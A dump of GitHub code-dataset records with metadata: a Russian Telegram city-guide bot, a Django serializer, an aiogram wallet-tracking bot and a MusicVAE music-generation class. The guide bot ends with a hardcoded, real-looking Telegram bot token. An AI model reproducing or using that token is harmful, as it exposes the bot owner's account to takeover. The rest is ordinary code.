='Что Вам наиболее интересно?',\n reply_markup = reply_markup , parse_mode = 'Markdown')\n elif query.data == 'Заново':\n self.data = Users_Data.get(id)\n self.begin = Users_Begins.get(id)\n self.end = Users_Ends.get(id)\n \n self.begin = 0\n self.end = 10\n\n Users_Begins[id] = self.begin\n Users_Ends[id] = self.end\n \n bot.delete_message(chat_id = id, message_id = m_id)\n self.updateKeyboard(self.begin,self.end)\n reply_markup = InlineKeyboardMarkup(self.keyboard)\n if(self.begin < self.end):\n bot.send_message(chat_id = id, message_id = m_id, text ='Что Вам наиболее интересно?',\n reply_markup = reply_markup, parse_mode = 'Markdown')\n elif query.data == 'back':\n self.data = Users_Data.get(id)\n self.begin = Users_Begins.get(id)\n self.end = Users_Ends.get(id)\n \n bot.delete_message(chat_id = id, message_id = m_id)\n self.updateKeyboard(self.begin,self.end)\n reply_markup = InlineKeyboardMarkup(self.keyboard) \n bot.send_message(chat_id = id, message_id = m_id, text ='Что Вам наиболее интересно?',\n reply_markup = reply_markup, parse_mode = 'Markdown')\n elif query.data == 'delphoto':\n bot.delete_message(chat_id = id, message_id = m_id)\n elif query.data == 'Маршрут':\n self.data = Users_Data.get(id)\n self.begin = Users_Begins.get(id)\n self.end = Users_Ends.get(id)\n self.marshr = Marshrs.get(id)\n long = self.data[self.marshr][7]\n lat = self.data[self.marshr][6]\n bot.send_location(chat_id=id,message_id= m_id,\n longitude = long, latitude=lat) \n else:\n for i in range(self.begin, self.end):\n if query.data == str(i):\n self.data = Users_Data.get(id)\n self.begin = Users_Begins.get(id)\n self.end = Users_Ends.get(id)\n \n self.marshr = i\n Marshrs[id] = i\n bot.delete_message(chat_id = id, message_id = m_id)\n keyb = [[InlineKeyboardButton('Закрыть', callback_data = 'delphoto')]]\n reply_markup = InlineKeyboardMarkup(keyb)\n bot.send_photo(chat_id = id, photo = self.data[i][8],\n reply_markup = reply_markup)\n \n self.keyb = [[InlineKeyboardButton('Показать на карте', callback_data = 'Маршрут')],\n [InlineKeyboardButton('Назад', callback_data = 'back')]]\n reply_markup = InlineKeyboardMarkup(self.keyb)\n bot.send_message(chat_id = id, message_id = m_id,\n text =self.data[i][1]+\"\\n\"+\"Адрес: \"+ self.data[i][2]+\"\\n\"+self.data[i][4]+\"\\n\"\n +\"Расписание: \"+ self.data[i][5],\n reply_markup = reply_markup, parse_mode = 'Markdown') \n \n \n \n \n \n\n # Create the Updater and pass it your bot's token.\nbott = Bott('495453959:AAH26CmZCbrHcGv0N60y4sw6cTE_OpUtsGI')\nbott.start_handler()\n\n", "repo_name": "mabmstu/GuideBot", "sub_path": "GuideBot.py", "file_name": "GuideBot.py", "file_ext": "py", "file_size_in_byte": 10357, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 9, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 23, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 27, "usage_type": "call"}, {"api_name": "telegram.ext.CallbackQueryHandler", "line_number": 28, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 29, "usage_type": "call"}, {"api_name": "telegram.ext.MessageHandler", "line_number": 30, "usage_type": "call"}, {"api_name": "telegram.ext.Filters.all", "line_number": 30, "usage_type": "attribute"}, {"api_name": "telegram.ext.Filters", "line_number": 30, "usage_type": "name"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 48, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 50, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 52, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 68, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 80, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 81, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 83, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 85, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 86, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 111, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 129, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 153, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 170, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 181, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 205, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 206, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 210, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 211, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 212, "usage_type": "call"}]}
+{"seq_id": "2251859569", "text": "from rest_framework import serializers\nfrom .models import SudTask\n\n\nclass SudTaskSerializer(serializers.ModelSerializer):\n class Meta:\n model = SudTask\n fields = [\n 'id',\n 'task_id',\n 'team',\n 'is_complete',\n 'complete_date',\n 'created_date',\n 'updated_date',\n ]", "repo_name": "KooHyunJung/DRF-task-system", "sub_path": "sub_task/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 364, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 5, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 5, "usage_type": "name"}, {"api_name": "models.SudTask", "line_number": 7, "usage_type": "name"}]}
+{"seq_id": "5509438698", "text": "from aiogram.dispatcher import FSMContext\nimport re\nfrom aiogram.types import Message, CallbackQuery\nfrom bot import dp, bot\nfrom crud.user import check_user, get_name\nfrom crud.wallet import new_wallet, get_all_wallets, get_balance, remove_wallet, get_all_wallets_names\nfrom aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\nfrom states.WalletState import WalletMenuState\nfrom states.UserState import UserState\n\nfrom utils.keyboards.main_menu import wallet_cb\nfrom utils.keyboards.wallet_menu import wallet_menu_kb\nfrom utils.keyboards.main_menu import main_menu_kb\n\n\n@dp.callback_query_handler(wallet_cb.filter(action=\"wallet_start\"), state=\"*\")\nasync def show_wallet_menu(callback: CallbackQuery, callback_data: dict, state: FSMContext):\n await bot.answer_callback_query(callback.id)\n await WalletMenuState.idle.set()\n menu_message_id = callback.message.message_id\n await bot.edit_message_reply_markup(chat_id=callback.from_user.id, message_id=menu_message_id, reply_markup=wallet_menu_kb)\n\n# Wallet creation\n@dp.callback_query_handler(wallet_cb.filter(action=\"wallet_create\"), state=\"*\")\nasync def cmd_create_wallet(callback: CallbackQuery, callback_data: dict, state: FSMContext):\n await bot.answer_callback_query(callback.id)\n user_id = callback.from_user.id\n if check_user(user_id):\n await WalletMenuState.create.set()\n await bot.edit_message_text(chat_id=callback.from_user.id, message_id=callback.message.message_id, text=\"Добавим кошелек, введите название кошелька\")\n else:\n UserState.in_menu.set()\n await bot.edit_message_text(chat_id=callback.from_user.id, message_id=callback.message.message_id, text=\"Вы не зарегистрированы\")\n\n\n@dp.message_handler(state=WalletMenuState.create)\nasync def create_wallet(message: Message, state: FSMContext):\n user_id = message.from_user.id\n wallets = get_all_wallets_names(user_id)\n if message.text not in wallets:\n new_wallet(user_id, message.text)\n await WalletMenuState.idle.set()\n await message.answer(f\"Кошелек {message.text} создан\", reply_markup=wallet_menu_kb)\n\n else:\n await WalletMenuState.idle.set()\n await message.answer(f\"Такой кошелек уже есть\", reply_markup=wallet_menu_kb)\n\n\n#Getting all wallets\n@dp.callback_query_handler(wallet_cb.filter(action=\"wallet_get_all\"), state=\"*\")\nasync def cmd_get_all_wallets(callback: CallbackQuery, callback_data: dict, state: FSMContext):\n await bot.answer_callback_query(callback.id)\n await WalletMenuState.get_all.set()\n wallets = get_all_wallets(callback.from_user.id)\n reply_text = \"Ваши кошельки:\"\n for wallet in wallets:\n reply_text = reply_text+f\"\\n\\\\- *{wallet['name']}*: {wallet['balance']}\"\n await bot.edit_message_text(chat_id=callback.from_user.id, message_id=callback.message.message_id, text=reply_text, reply_markup=wallet_menu_kb)\n await WalletMenuState.idle.set()\n # await bot.send_message(chat_id=callback.from_user.id, text=\"Меню\", reply_markup=wallet_menu_kb)\n\n\n\n\n\n\n\n@dp.message_handler(commands=\"get_balance\")\nasync def cmd_get_balance(message: Message):\n user_id = message.from_user.id\n ikb = InlineKeyboardMarkup(row_width=2)\n if check_user(user_id):\n user_name = get_name(user_id)\n user_wallets = get_all_wallets(user_id)\n\n for wallet in user_wallets:\n\n ikb.add(InlineKeyboardButton(\n text=wallet[\"name\"],\n callback_data=wallet_cb.new(name=wallet[\"name\"], action=\"get_wallet\")\n ))\n await message.answer(f\"Привет, {user_name}, выбери кошелек\", reply_markup=ikb)\n else:\n await message.answer(f\"Вы не зарегистрированы\")\n\n\n\n@dp.callback_query_handler(wallet_cb.filter(action=\"get_wallet\"))\nasync def get_wallet_balance(callback: CallbackQuery, callback_data: dict):\n await bot.answer_callback_query(callback.id)\n wallet_name = callback_data[\"name\"]\n if get_all_wallets_names(callback.from_user.id):\n balance = get_balance(callback.from_user.id, wallet_name)\n await bot.send_message(chat_id= callback.from_user.id ,text = f'На балансе кошелька {wallet_name} находится {balance}')\n else:\n await bot.send_message(chat_id= callback.from_user.id ,text = f'У тебя нет кошельков воспользуйся командой /create_wallet')\n\n\n#removing wallet\n@dp.callback_query_handler(wallet_cb.filter(action=\"wallet_delete\"), state=\"*\")\nasync def cmd_rmv_wallet(callback: CallbackQuery, callback_data: dict, state: FSMContext):\n user_id = callback.from_user.id\n\n if check_user(user_id):\n user_wallets = get_all_wallets(user_id)\n if user_wallets:\n ikb = InlineKeyboardMarkup(row_width=1)\n await WalletMenuState.remove.set()\n for wallet in user_wallets:\n ikb.add(InlineKeyboardButton(\n text=wallet[\"name\"],\n callback_data=wallet_cb.new(name=wallet[\"name\"], action=\"rmv_wallet\")\n ))\n await bot.edit_message_text(chat_id=user_id, message_id=callback.message.message_id, text=\"Выберите кошелек для удаления\")\n await bot.edit_message_reply_markup(chat_id=user_id, message_id=callback.message.message_id, reply_markup=ikb)\n else:\n await bot.send_message(chat_id=user_id, text=\"У вас нет кошельков\\\\.\", reply_markup=wallet_menu_kb)\n else:\n await bot.send_message(chat_id=user_id, text=\"Вы не зарегистрированы, воспользуйтесь командой /start\")\n\n\n@dp.callback_query_handler(wallet_cb.filter(action=\"rmv_wallet\"), state=\"*\")\nasync def rmv_wallet(callback: CallbackQuery, callback_data: dict):\n await bot.answer_callback_query(callback.id)\n wallet_name = callback_data[\"name\"]\n remove_wallet(callback.from_user.id, wallet_name)\n await WalletMenuState.idle.set()\n await bot.edit_message_text(chat_id=callback.from_user.id, message_id=callback.message.message_id, text=\"Кошелек был удален\\\\.\", reply_markup=wallet_menu_kb)\n\n\n@dp.callback_query_handler(wallet_cb.filter(action=\"wallet_go_back\"), state=\"*\")\nasync def wallet_go_back(callback: CallbackQuery, callback_data: dict):\n await UserState.in_menu.set()\n await bot.edit_message_text(chat_id=callback.from_user.id, message_id=callback.message.message_id, text=\"Меню\", reply_markup=main_menu_kb)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "aryzhykau/spendings-api", "sub_path": "handlers/wallet.py", "file_name": "wallet.py", "file_ext": "py", "file_size_in_byte": 6620, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "aiogram.types.CallbackQuery", "line_number": 17, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 17, "usage_type": "name"}, {"api_name": "bot.bot.answer_callback_query", "line_number": 18, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 18, "usage_type": "name"}, {"api_name": "states.WalletState.WalletMenuState.idle.set", "line_number": 19, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.idle", "line_number": 19, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 19, "usage_type": "name"}, {"api_name": "bot.bot.edit_message_reply_markup", "line_number": 21, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 21, "usage_type": "name"}, {"api_name": "utils.keyboards.wallet_menu.wallet_menu_kb", "line_number": 21, "usage_type": "name"}, {"api_name": "bot.dp.callback_query_handler", "line_number": 16, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 16, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.filter", "line_number": 16, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 16, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 25, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 25, "usage_type": "name"}, {"api_name": "bot.bot.answer_callback_query", "line_number": 26, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 26, "usage_type": "name"}, {"api_name": "crud.user.check_user", "line_number": 28, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.create.set", "line_number": 29, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.create", "line_number": 29, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 29, "usage_type": "name"}, {"api_name": "bot.bot.edit_message_text", "line_number": 30, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 30, "usage_type": "name"}, {"api_name": "states.UserState.UserState.in_menu.set", "line_number": 32, "usage_type": "call"}, {"api_name": "states.UserState.UserState.in_menu", "line_number": 32, "usage_type": "attribute"}, {"api_name": "states.UserState.UserState", "line_number": 32, "usage_type": "name"}, {"api_name": "bot.bot.edit_message_text", "line_number": 33, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 33, "usage_type": "name"}, {"api_name": "bot.dp.callback_query_handler", "line_number": 24, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 24, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.filter", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 24, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 37, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 37, "usage_type": "name"}, {"api_name": "crud.wallet.get_all_wallets_names", "line_number": 39, "usage_type": "call"}, {"api_name": "crud.wallet.new_wallet", "line_number": 41, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.idle.set", "line_number": 42, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.idle", "line_number": 42, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 42, "usage_type": "name"}, {"api_name": "utils.keyboards.wallet_menu.wallet_menu_kb", "line_number": 43, "usage_type": "name"}, {"api_name": "states.WalletState.WalletMenuState.idle.set", "line_number": 46, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.idle", "line_number": 46, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 46, "usage_type": "name"}, {"api_name": "utils.keyboards.wallet_menu.wallet_menu_kb", "line_number": 47, "usage_type": "name"}, {"api_name": "bot.dp.message_handler", "line_number": 36, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 36, "usage_type": "name"}, {"api_name": "states.WalletState.WalletMenuState.create", "line_number": 36, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 36, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 52, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 52, "usage_type": "name"}, {"api_name": "bot.bot.answer_callback_query", "line_number": 53, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 53, "usage_type": "name"}, {"api_name": "states.WalletState.WalletMenuState.get_all.set", "line_number": 54, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.get_all", "line_number": 54, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 54, "usage_type": "name"}, {"api_name": "crud.wallet.get_all_wallets", "line_number": 55, "usage_type": "call"}, {"api_name": "bot.bot.edit_message_text", "line_number": 59, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 59, "usage_type": "name"}, {"api_name": "utils.keyboards.wallet_menu.wallet_menu_kb", "line_number": 59, "usage_type": "name"}, {"api_name": "states.WalletState.WalletMenuState.idle.set", "line_number": 60, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.idle", "line_number": 60, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 60, "usage_type": "name"}, {"api_name": "bot.dp.callback_query_handler", "line_number": 51, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 51, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.filter", "line_number": 51, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 51, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 70, "usage_type": "name"}, {"api_name": "aiogram.types.InlineKeyboardMarkup", "line_number": 72, "usage_type": "call"}, {"api_name": "crud.user.check_user", "line_number": 73, "usage_type": "call"}, {"api_name": "crud.user.get_name", "line_number": 74, "usage_type": "call"}, {"api_name": "crud.wallet.get_all_wallets", "line_number": 75, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardButton", "line_number": 79, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.new", "line_number": 81, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 81, "usage_type": "name"}, {"api_name": "bot.dp.message_handler", "line_number": 69, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 69, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 90, "usage_type": "name"}, {"api_name": "bot.bot.answer_callback_query", "line_number": 91, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 91, "usage_type": "name"}, {"api_name": "crud.wallet.get_all_wallets_names", "line_number": 93, "usage_type": "call"}, {"api_name": "crud.wallet.get_balance", "line_number": 94, "usage_type": "call"}, {"api_name": "bot.bot.send_message", "line_number": 95, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 95, "usage_type": "name"}, {"api_name": "bot.bot.send_message", "line_number": 97, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 97, "usage_type": "name"}, {"api_name": "bot.dp.callback_query_handler", "line_number": 89, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 89, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.filter", "line_number": 89, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 89, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 102, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 102, "usage_type": "name"}, {"api_name": "crud.user.check_user", "line_number": 105, "usage_type": "call"}, {"api_name": "crud.wallet.get_all_wallets", "line_number": 106, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardMarkup", "line_number": 108, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.remove.set", "line_number": 109, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.remove", "line_number": 109, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 109, "usage_type": "name"}, {"api_name": "aiogram.types.InlineKeyboardButton", "line_number": 111, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.new", "line_number": 113, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 113, "usage_type": "name"}, {"api_name": "bot.bot.edit_message_text", "line_number": 115, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 115, "usage_type": "name"}, {"api_name": "bot.bot.edit_message_reply_markup", "line_number": 116, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 116, "usage_type": "name"}, {"api_name": "bot.bot.send_message", "line_number": 118, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 118, "usage_type": "name"}, {"api_name": "utils.keyboards.wallet_menu.wallet_menu_kb", "line_number": 118, "usage_type": "name"}, {"api_name": "bot.bot.send_message", "line_number": 120, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 120, "usage_type": "name"}, {"api_name": "bot.dp.callback_query_handler", "line_number": 101, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 101, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.filter", "line_number": 101, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 101, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 124, "usage_type": "name"}, {"api_name": "bot.bot.answer_callback_query", "line_number": 125, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 125, "usage_type": "name"}, {"api_name": "crud.wallet.remove_wallet", "line_number": 127, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.idle.set", "line_number": 128, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.idle", "line_number": 128, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 128, "usage_type": "name"}, {"api_name": "bot.bot.edit_message_text", "line_number": 129, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 129, "usage_type": "name"}, {"api_name": "utils.keyboards.wallet_menu.wallet_menu_kb", "line_number": 129, "usage_type": "name"}, {"api_name": "bot.dp.callback_query_handler", "line_number": 123, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 123, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.filter", "line_number": 123, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 123, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 133, "usage_type": "name"}, {"api_name": "states.UserState.UserState.in_menu.set", "line_number": 134, "usage_type": "call"}, {"api_name": "states.UserState.UserState.in_menu", "line_number": 134, "usage_type": "attribute"}, {"api_name": "states.UserState.UserState", "line_number": 134, "usage_type": "name"}, {"api_name": "bot.bot.edit_message_text", "line_number": 135, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 135, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.main_menu_kb", "line_number": 135, "usage_type": "name"}, {"api_name": "bot.dp.callback_query_handler", "line_number": 132, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 132, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.filter", "line_number": 132, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 132, "usage_type": "name"}]}
+{"seq_id": "71645577448", "text": "from music21 import instrument\nfrom MLSongs.database.db_services import get_songs_by_author\nfrom MLSongs.ml_agents.ml_model_base import MLModelBase\nfrom MLSongs.ml_agents.postprocessing_utils import sample, create_midi_with_embedded_durations, \\\n change_midi_instrument, midi_to_wav\nfrom MLSongs.ml_agents.preprocessing_utils import get_chords_and_durations_of_instrument, \\\n create_mapper_data, create_mapper, encode_notes, clear_encoded_data, \\\n parse_everything_together, filter_outliers\nfrom MLSongs.ml_agents.utilities import combine_chords_with_durations, get_key_from_value\nimport numpy as np\n\n\nclass MusicVAE(MLModelBase):\n\n def __init__(self, instrument_str):\n if \"bass\" in instrument_str.lower():\n self.target_instrument_str = \"Electric Bass\"\n self.target_instrument = instrument.ElectricBass()\n self.instrument_name = \"bass\"\n super(MusicVAE, self).__init__(\"MusicVAEBass\", \"ml_models/VAE_bassdecoder.h5\")\n if \"guitar\" in instrument_str.lower():\n self.target_instrument_str = \"Electric Guitar\"\n self.target_instrument = instrument.ElectricGuitar()\n self.instrument_name = \"guitar\"\n super(MusicVAE, self).__init__(\"MusicVAEGuitar\", \"ml_models/VAE_guitar_long_decoder.h5\")\n self.slice_len = 256\n self.latent_dim = 256\n\n def preprocess_data(self, data):\n allchords, alldurations = get_chords_and_durations_of_instrument(data, self.target_instrument_str)\n\n assert (len(allchords) == len(alldurations))\n\n combined = []\n for i in range(len(allchords)):\n combined.append(combine_chords_with_durations(allchords[i], alldurations[i]))\n\n self.mapper = create_mapper(create_mapper_data(combined))\n guitar_chords = encode_notes(combined, self.mapper)\n guitar_chords = clear_encoded_data(guitar_chords, self.mapper)\n\n guitar_input, guitar_output = parse_everything_together(guitar_chords, self.slice_len)\n\n outlier_constant = 80\n guitar_input, guitar_output, self.mapper_list = filter_outliers(guitar_input, guitar_output, outlier_constant)\n\n input = np.reshape(np.asarray(guitar_input), (len(guitar_input), self.slice_len, 1))\n\n input = np.asarray(input) / float(len(self.mapper))\n\n return input\n\n def predict(self, input, count, temp):\n songs_in_db_cnt = len(get_songs_by_author(self.db_name))\n to_generate = count\n\n for j in range(songs_in_db_cnt, songs_in_db_cnt + to_generate):\n\n noise = np.random.normal(size=self.latent_dim)\n noise = np.expand_dims(noise, 0)\n pred = self.model.predict(noise)\n\n predicted = []\n for i in pred:\n for k in i:\n index = sample(k, temp)\n if self.mapper_list is not None: # Idx of the mapper list is the new value, the element is the old value. This is used when I filter for outliers.\n index = self.mapper_list[index]\n pred_note = get_key_from_value(index, self.mapper)\n predicted.append(pred_note)\n\n\n midi_path = f'MusicVAE_{self.instrument_name}_{j}.mid'\n create_midi_with_embedded_durations(predicted, target_instrument=self.target_instrument, filename=midi_path)\n\n change_midi_instrument(midi_path, self.target_instrument)\n midi_to_wav(midi_path, f'static/songs/MusicVAE_{self.instrument_name}_{j}.wav')\n\n self.save_song_to_db(f'MusicVAE_{self.instrument_name}_{j}.wav')", "repo_name": "darkpanther99/DeepLearningMusicGeneration", "sub_path": "DjangoApp/MLSongs/ml_agents/MusicVAE.py", "file_name": "MusicVAE.py", "file_ext": "py", "file_size_in_byte": 3588, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "MLSongs.ml_agents.ml_model_base.MLModelBase", "line_number": 13, "usage_type": "name"}, {"api_name": "music21.instrument.ElectricBass", "line_number": 18, "usage_type": "call"}, {"api_name": "music21.instrument", "line_number": 18, "usage_type": "name"}, {"api_name": "music21.instrument.ElectricGuitar", "line_number": 23, "usage_type": "call"}, {"api_name": "music21.instrument", "line_number": 23, "usage_type": "name"}, {"api_name": "MLSongs.ml_agents.preprocessing_utils.get_chords_and_durations_of_instrument", "line_number": 30, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.utilities.combine_chords_with_durations", "line_number": 36, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.preprocessing_utils.create_mapper", "line_number": 38, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.preprocessing_utils.create_mapper_data", "line_number": 38, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.preprocessing_utils.encode_notes", "line_number": 39, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.preprocessing_utils.clear_encoded_data", "line_number": 40, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.preprocessing_utils.parse_everything_together", "line_number": 42, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.preprocessing_utils.filter_outliers", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 49, "usage_type": "call"}, {"api_name": "MLSongs.database.db_services.get_songs_by_author", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 60, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.postprocessing_utils.sample", "line_number": 66, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.utilities.get_key_from_value", "line_number": 69, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.postprocessing_utils.create_midi_with_embedded_durations", "line_number": 74, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.postprocessing_utils.change_midi_instrument", "line_number": 76, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.postprocessing_utils.midi_to_wav", "line_number": 77, "usage_type": "call"}]}
